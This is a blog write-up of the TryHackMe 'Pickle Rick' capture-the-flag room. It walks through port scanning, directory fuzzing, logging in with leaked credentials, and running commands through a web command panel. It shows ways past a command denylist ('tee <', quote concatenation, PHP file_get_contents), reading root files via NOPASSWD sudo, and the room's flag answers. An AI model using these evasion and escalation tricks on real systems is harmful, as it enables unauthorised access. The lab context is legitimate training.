---
layout: post
title: "Pickle Rick - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - web
  - thm
  - linux
  - php
date: 2021/03/10 20:37:00
thumbnail: /images/TryHackMe/picklerick.jpeg
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Pickle Rick
- **Profile:** [tryhackme.com](https://tryhackme.com/room/picklerick)
- **Difficulty:** Easy
- **Description**: A Rick and Morty CTF. Help turn Rick back into a human!

![Pickle Rick](/images/TryHackMe/picklerick.jpeg)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap ffuf ruby-ctf-party
```

## Network Enumeration

Port scan with nmap:

```plaintext
# Nmap 7.91 scan initiated Tue Mar  9 19:36:57 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.8.120
Increasing send delay for 10.10.8.120 from 0 to 5 due to 1140 out of 3798 dropped probes since last increase.
Nmap scan report for 10.10.8.120
Host is up (0.033s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d1:0b:bf:7c:00:3f:36:f0:90:db:f5:36:b1:42:53:91 (RSA)
|   256 0b:f5:aa:8c:57:e6:15:68:c6:ca:d3:db:58:ec:46:19 (ECDSA)
|_  256 a3:c2:c0:fa:a6:f6:19:00:ce:95:2e:8f:ce:7a:4d:d0 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar  9 19:44:02 2021 -- 1 IP address (1 host up) scanned in 424.83 seconds
```

## Web discovery

If we look at the source code of the home page of the web app, we can see a HTML
comment leaking a username:

```html
  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->
```

## Web enumeration

Let's find some pages:

```plaintext
$ ffuf -u http://10.10.8.120/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403
...
index.html              [Status: 200, Size: 1062, Words: 148, Lines: 38]
robots.txt              [Status: 200, Size: 17, Words: 1, Lines: 2]
.                       [Status: 200, Size: 1062, Words: 148, Lines: 38]
portal.php              [Status: 302, Size: 0, Words: 1, Lines: 1]
login.php               [Status: 200, Size: 882, Words: 89, Lines: 26]
denied.php              [Status: 302, Size: 0, Words: 1, Lines: 1]

$ ffuf -u http://10.10.8.120/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fc 403 -e .php
...
# no new files
```

`robots.txt` contains a troll message, `portal.php` redirects to `login.php`
probably because we are not authenticated.

## 1st ingredient

Ok now it's super dumb and not realistic at all but the _word_ `Wubbalubbadubdub`
contained in `robots.txt` was not a troll but the actual password of `R1ckRul3s`.
So here no vulnerability to identify or brute-force to do with hydra.

Once authenticated there are a bunch of pages were we can see the following message:

> Only the REAL rick can view this page..

So we don't have the proper profile to see those pages, but we can access
`/portal.php` that contains a form entitled `Command Panel` were we can
directly write a system command to be executed (ultra realistic again).

Let's try some basic commands:

`ls -lhA`

```plaintext
total 32K
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4.0K Feb 10  2019 assets
-rwxr-xr-x 1 ubuntu ubuntu   54 Feb 10  2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1.1K Feb 10  2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1.1K Feb 10  2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1.5K Feb 10  2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2.0K Feb 10  2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 robots.txt
```

But when we try to read the suspicious file with `cat Sup3rS3cretPickl3Ingred.txt`
we obtain the following message `Command disabled to make it hard for future PICKLEEEE RICCCKKKK.`
(ultra realistic again) and the source code is containing the following comment (ultra realistic again):

```html
<!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
```

It's a nested base64 string (base64 string containing a base64 string etc.) but with
incorrect padding so we to remove or add some which make it unhandy to pipe
`base64` command on the terminal so I rather used [ctf-party](https://github.com/noraj/ctf-party)
to decode the string. Here is the toxic message I got:

```ruby
$ ctf_party_console
irb(main):001:0> b64 = 'Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0=='
irb(main):009:0> b64[0..-2].from_b64.from_b64.concat('=').from_b64.from_b64.from_b64.from_b64.from_b64
=> "rabbit hole"
```

You know what? Another toxic unrealistic step! It's a shame we don't know the
author of the box to shame it.

Let's get back to `Sup3rS3cretPickl3Ingred.txt` where the command `cat` is
forbidden. We can do `tee < Sup3rS3cretPickl3Ingred.txt` instead:

1st ingredient: {% spoiler `mr. meeseek hair` %}

It seems to be the first ingredient.

Note: Of course if you don't know the restricted shell escape trick we `tee` you
could just request http://10.10.8.120/Sup3rS3cretPickl3Ingred.txt via HTTP as it
is on the the web server root folder.

Note2: `tee < portal.php` shows the forbidden commands were:
`$cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");`

## 2nd ingredient

Same as for the 1st ingredient.

```plaintext
$ ls -lhA /home
total 8.0K
drwxrwxrwx 2 root   root   4.0K Feb 10  2019 rick
drwxr-xr-x 4 ubuntu ubuntu 4.0K Feb 10  2019 ubuntu

$ tee < '/home/rick/second ingredients'
```

2nd ingredient: {% spoiler `1 jerry tear` %}

## 3rd ingredient

We can run anything as root without a password:

```plaintext
$ sudo -l

Matching Defaults entries for www-data on ip-10-10-8-120.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-8-120.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

$ sudo ls -lhA /root

total 20K
-rw-r--r-- 1 root root 3.1K Oct 22  2015 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
drwx------ 2 root root 4.0K Feb 10  2019 .ssh
-rw-r--r-- 1 root root   29 Feb 10  2019 3rd.txt
drwxr-xr-x 3 root root 4.0K Feb 10  2019 snap
```

We can use `tee` with sudo because of the redirection operator so let's use another
[shell escape technique][42]: Quotes / Concatenation on the binary name. We can also
sue PHP, etc.

```
$ sudo php -r "echo file_get_contents('/root/3rd.txt');"
$ sudo 'c'a't' /root/3rd.txt
```

3rd ingredient: {% spoiler `fleeb juice` %}

[42]:https://book.hacktricks.xyz/linux-unix/useful-linux-commands/bypass-bash-restrictions
